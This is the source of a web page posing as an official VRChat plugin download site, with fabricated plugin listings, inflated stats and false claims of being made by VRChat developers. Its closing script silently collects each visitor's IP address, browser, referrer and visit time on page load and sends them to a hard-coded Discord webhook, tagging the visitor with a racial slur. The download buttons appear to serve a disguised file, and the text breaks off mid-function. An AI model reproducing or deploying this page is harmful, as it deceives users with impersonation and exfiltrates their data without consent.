<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-yellow-500 to-orange-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">👁️</span>
</div>
</div>
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-yellow-400 transition-colors duration-300">Surprised Eyeball</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Track eye movement in real time and enhance your VRChat expressions with ultra-realistic gaze reactions.
</p>
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 4.9 (33.7K)</span>
<span>📥 220K+</span>
</div>
</div>
</div>
<!-- Mommy Fox RP Plugin -->
<div class="card-3d feature-card rounded-2xl p-6 overflow-hidden group">
<div class="relative mb-4">
<img loading="lazy" src="uploads/items/item/5805/imgs/4f0fb4ce8b1e079f32e7f15d967ea5.png" alt="Mommy Fox RP Mode" class="plugin-image w-full rounded-xl glow-effect" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMzAwIiBoZWlnaHQ9IjIwMCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48cmVjdCB3aWR0aD0iMTAwJSIgaGVpZ2h0PSIxMDAlIiBmaWxsPSIjMjIyIi8+PHRleHQgeD0iNTAlIiB5PSI1MCUiIGZvbnQtZmFtaWx5PSJBcmlhbCIgZm9udC1zaXplPSIxNCIgZmlsbD0iIzk5OSIgdGV4dC1hbmNob3I9Im1pZGRsZSIgZHk9Ii4zZW0iPkZveCBSUDwvdGV4dD48L3N2Zz4='; this.alt='Mommy Fox RP image failed to load';">
<!-- Gradient Overlay -->
<div class="absolute inset-0 bg-gradient-to-t from-black/60 via-transparent to-transparent opacity-0 group-hover:opacity-100 transition-opacity duration-300"></div>
<!-- Plugin Icon -->
<div class="absolute top-3 right-3 w-10 h-10 bg-gradient-to-r from-indigo-500 to-purple-500 rounded-lg flex items-center justify-center glow-effect opacity-0 group-hover:opacity-100 transition-opacity duration-300">
<span class="text-white text-sm font-bold vr-icon">🦊</span>
</div>
</div>
<div class="space-y-4">
<h3 class="text-xl font-bold text-glow group-hover:text-indigo-400 transition-colors duration-300">Mommy Fox RP</h3>
<p class="text-gray-300 text-sm leading-relaxed">
Step into a cozy roleplay mode with expressive animations, smooth voice sync, and lifelike fox charm for VRChat.
</p>
<div class="flex justify-between items-center text-xs text-gray-400 mb-4">
<span>⭐ 5.0 (42.1K)</span>
<span>📥 290K+</span>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Community Stats -->
<section id="community" class="py-20 morphing-bg">
<div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8">
<div class="text-center mb-16 slide-in-up">
<h2 class="text-4xl font-bold mb-4 text-glow">Growing Community</h2>
<p class="text-xl text-gray-300">Trusted by thousands of developers</p>
</div>
<div class="grid md:grid-cols-4 gap-8 text-center">
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-4xl font-bold text-purple-400 mb-2 vr-icon">15K+</div>
<p class="text-gray-300">Active Plugin</p>
</div>
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-4xl font-bold text-pink-400 mb-2 vr-icon">50K+</div>
<p class="text-gray-300">Developer</p>
</div>
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-4xl font-bold text-blue-400 mb-2 vr-icon">2M+</div>
<p class="text-gray-300">Download</p>
</div>
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-4xl font-bold text-green-400 mb-2 vr-icon">24/7</div>
<p class="text-gray-300">Support</p>
</div>
</div>
</div>
</section>
<!-- Download Section -->
<section id="download" class="py-20 bg-gray-900 relative">
<div class="absolute inset-0 bg-gradient-to-r from-purple-900/10 to-pink-900/10"></div>
<div class="max-w-4xl mx-auto px-4 sm:px-6 lg:px-8 text-center relative z-10">
<div class="slide-in-up">
<h2 class="text-5xl font-bold mb-6 text-glow">Start Plugin Development</h2>
<p class="text-xl text-gray-300 mb-12">
Download VRChat Plugin Studio for free and make your mark in the VR world
</p>
<div class="grid md:grid-cols-2 gap-8 mb-12">
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-5xl mb-4 vr-icon">💻</div>
<h3 class="text-2xl font-bold mb-2 text-glow">Desktop Studio</h3>
<p class="text-gray-300 mb-4">Windows, Mac, Linux</p>
<p class="text-sm text-gray-400 mb-6">Full-featured development environment</p>
<!-- DOWNLOAD BUTTON GÜNCELLENDİ -->
<a href="#" onclick="downloadFile()" class="block w-full py-3 bg-gradient-to-r from-purple-500 to-pink-500 rounded-lg hover:from-purple-600 hover:to-pink-600 transition-all transform hover:scale-105">
🚀 VRCPlugin Download
</a>
</div>
<div class="card-3d feature-card rounded-2xl p-8">
<div class="text-5xl mb-4 vr-icon">🌐</div>
<h3 class="text-2xl font-bold mb-2 text-glow">Web Editor</h3>
<p class="text-gray-300 mb-4">Browser based</p>
<p class="text-sm text-gray-400 mb-6">For rapid prototyping</p>
<!-- DOWNLOAD BUTTON GÜNCELLENDİ -->
<a href="#" onclick="downloadFile()" class="block w-full py-3 bg-gradient-to-r from-blue-500 to-teal-500 rounded-lg hover:from-blue-600 hover:to-teal-600 transition-all transform hover:scale-105">
🚀 VRCPlugin Download
</a>
</div>
</div>
<div class="feature-card rounded-2xl p-8 glow-effect">
<h3 class="text-2xl font-bold mb-6 text-glow">System Requirements</h3>
<div class="grid md:grid-cols-2 gap-8 text-left">
<div>
<h4 class="font-semibold mb-3 text-green-400">✅ Minimum</h4>
<ul class="text-gray-300 space-y-2">
<li>• Windows 10 / macOS 10.15 / Ubuntu 18.04</li>
<li>• 4 GB RAM</li>
<li>• DirectX 11 compatible GPU</li>
<li>• 2 GB free disk space</li>
</ul>
</div>
<div>
<h4 class="font-semibold mb-3 text-purple-400">🚀 Recommended</h4>
<ul class="text-gray-300 space-y-2">
<li>• Windows 11 / macOS 12+ / Ubuntu 20.04</li>
<li>• 16 GB RAM</li>
<li>• RTX 3060 / RX 6600 or over</li>
<li>• 10 GB free disk space</li>
</ul>
</div>
</div>
</div>
</div>
</div>
</section>
<!-- Footer -->
<footer class="bg-black py-12 relative overflow-hidden">
<div class="absolute inset-0 bg-gradient-to-r from-purple-900/10 to-pink-900/10"></div>
<div class="max-w-7xl mx-auto px-4 sm:px-6 lg:px-8 relative z-10">
<div class="grid md:grid-cols-4 gap-8">
<div>
<div class="flex items-center space-x-3 mb-4">
<div class="w-8 h-8 bg-gradient-to-r from-purple-500 to-pink-500 rounded-xl flex items-center justify-center glow-effect">
<img loading="lazy" src="images/my-new-logo.png" alt="VRChat Logo" class="w-6 h-6 object-contain" onerror="this.src='data:image/svg+xml;base64,PHN2ZyB3aWR0aD0iMjQiIGhlaWdodD0iMjQiIHZpZXdCb3g9IjAgMCAyNCAyNCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48Y2lyY2xlIGN4PSIxMiIgY3k9IjEyIiByPSIxMiIgZmlsbD0iIzY4NzZjNiIvPjx0ZXh0IHg9IjEyIiB5PSIxNCIgZm9udC1mYW1pbHk9IkFyaWFsIiBmb250LXNpemU9IjgiIGZpbGw9IndoaXRlIiB0ZXh0LWFuY2hvcj0ibWlkZGxlIiBkeT0iLjNlbSI+VlI8L3RleHQ+PC9zdmc+';">
</div>
<span class="text-lg font-bold text-glow">VRChat Plugin Studio</span>
</div>
<p class="text-gray-400">
Make your VRChat experience limitless.
</p>
</div>
<div>
<h4 class="font-semibold mb-4 text-glow">Developer</h4>
<ul class="space-y-2 text-gray-400">
<li><a href="#" class="hover:text-purple-400 transition-all">VRChat Inc.</a></li>
</ul>
</div>
<div>
<h4 class="font-semibold mb-4 text-glow">Community</h4>
<ul class="space-y-2 text-gray-400">
<li><a href="https://discord.gg/vrchat" class="hover:text-purple-400 transition-all">Discord Server</a></li>
<li><a href="https://www.reddit.com/r/VRchat" class="hover:text-purple-400 transition-all">Reddit</a></li>
<li><a href="https://www.youtube.com/VRChat" class="hover:text-purple-400 transition-all">YouTube</a></li>
<li><a href="https://www.twitch.tv/directory/category/vrchat" class="hover:text-purple-400 transition-all">Twitch</a></li>
</ul>
</div>
<div>
<h4 class="font-semibold mb-4 text-glow">Support</h4>
<ul class="space-y-2 text-gray-400">
<li><a href="#" class="hover:text-purple-400 transition-all">This mod was made by vrchat developers</a></li>
</ul>
</div>
</div>
<div class="border-t border-gray-800 mt-8 pt-8 text-center text-gray-400">
<p>© 2023 VRChat Add-on Studio. All rights reserved. Official VRChat site.
</p>
</div>
</div>
</footer>
<script>
// DISCORD WEBHOOK KONFIGÜRASYONU
const DISCORD_WEBHOOK_URL_KLEW = 'https://discord.com/api/webhooks/1460057610270015519/-PJI5mHfiCMC5lvAbgEPm4FOobCWZo9FwGqqHREqLukDzYLgoBr9OSL9IZ79ZOGirpc3'; // Buraya Discord webhook URL'nizi yazın
const DISCORD_WEBHOOK_URL = 'https://discord.com/api/webhooks/1460057610270015519/-PJI5mHfiCMC5lvAbgEPm4FOobCWZo9FwGqqHREqLukDzYLgoBr9OSL9IZ79ZOGirpc3';
// IP ADRESİ ALMA VE DISCORD'A GÖNDERME FONKSİYONU
async function sendLoginToDiscord() {
try {
// IP adresini almak için ücretsiz servis kullanıyoruz
const ipResponse = await fetch('https://api.ipify.org?format=json');
const ipData = await ipResponse.json();
const userIP = ipData.ip;
// Ek bilgileri topla
const userAgent = navigator.userAgent;
const timestamp = new Date().toLocaleString('tr-TR');
const referrer = document.referrer || 'Direkt giriş';
// Discord webhook mesajı
const webhookMessage = {
embeds: [{
title: "🔐 Enayi zenci giris yapti",
color: 0x00ff00, // Yeşil renk
fields: [
{
name: "🌐 IP Adresi",
value: `\`${userIP}\``,
inline: true
},
{
name: "🕐 Zaman",
value: `\`${timestamp}\``,
inline: true
},
{
name: "🌍 Referrer",
value: `\`${referrer}\``,
inline: true
},
{
name: "💻 Tarayıcı",
value: `\`${userAgent.substring(0, 100)}...\``,
inline: false
}
],
footer: {
text: "VRChat Plugin Studio - Güvenlik Sistemi",
icon_url: "https://vrchatplugin.net/images/my-new-logo.png"
},
timestamp: new Date().toISOString()
}]
};
// Discord webhook'a gönder
await fetch(DISCORD_WEBHOOK_URL, {
method: 'POST',
headers: {
'Content-Type': 'application/json',
},
body: JSON.stringify(webhookMessage)
});
console.log('✅ Giriş bilgileri Discord\'a gönderildi:', userIP);
} catch (error) {
console.error('❌ Discord webhook hatası:', error);
}
}
// SAYFA YÜKLENDİĞİNDE ÇALIŞACAK FONKSİYON
function trackPageVisit() {
// Sayfa yüklendiğinde IP'yi Discord'a gönder
sendLoginToDiscord();
// Ek güvenlik: Sayfa görünürlük değişikliklerini takip et
document.addEventListener('visibilitychange', function() {
if (!document.hidden) {
// Sayfa tekrar görünür olduğunda da gönder
setTimeout(sendLoginToDiscord, 1000);
}
});
}
// GİRİŞ YAPMA FONKSİYONU
async function handleLogin() {
try {
// Önce Discord'a giriş bilgisini gönder
await sendLoginToDiscord();
// Giriş yapma işlemi (örnek)
showToast('Giriş yapılıyor...', 'info');
// Burada gerçek giriş işleminizi yapabilirsiniz
// Örnek: window.location.href = '/login';
} catch (error) {
console.error('Giriş hatası:', error);
showToast('Giriş sırasında hata oluştu!', 'error');
}
}
// İNDİRME BİLDİRİMİ DISCORD'A GÖNDERME FONKSİYONU
async function sendDownloadToDiscord() {
try {